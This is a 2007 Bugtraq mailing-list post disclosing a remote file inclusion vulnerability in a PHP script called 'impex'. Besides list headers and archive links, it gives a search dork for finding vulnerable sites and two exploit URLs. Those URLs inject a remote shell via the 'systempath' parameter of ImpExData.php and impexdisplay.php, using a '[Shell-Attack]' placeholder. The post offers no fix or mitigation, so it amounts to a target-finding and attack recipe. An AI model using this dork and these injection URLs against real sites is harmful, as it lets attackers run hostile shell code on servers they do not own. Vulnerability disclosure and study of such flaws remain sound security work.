Remote File Include In Script impex

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Remote File Include In Script impex
From: RaeD@xxxxxxxxxxx
Date: 4 May 2007 07:36:38 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

By Hasadya Raed
Contact : RaeD@xxxxxxxxxxx
Israel
--------------------------
Script : impex
Dork : "ipmex"
--------------------------
B.Files : 
ImpExData.php
impexdisplay.php
--------------------------
Exploits : 
http://www.Victim.com/impex/ImpExData.php?systempath=[Shell-Attack]

http://www.Victim.com/impex/impexdisplay.php?systempath=[Shell-Attack]

Prev by Date: Re: iDefense Security Advisory 04.30.07: Cerulean Studios Trillian Multiple IRC Vulnerabilities
Next by Date: RunCms <= 1.5.2 debug_show.php sql injection
Previous by thread: PHPSecurityAdmin Remote File Include Exploit
Next by thread: RunCms <= 1.5.2 debug_show.php sql injection
Index(es):
- Date
- Thread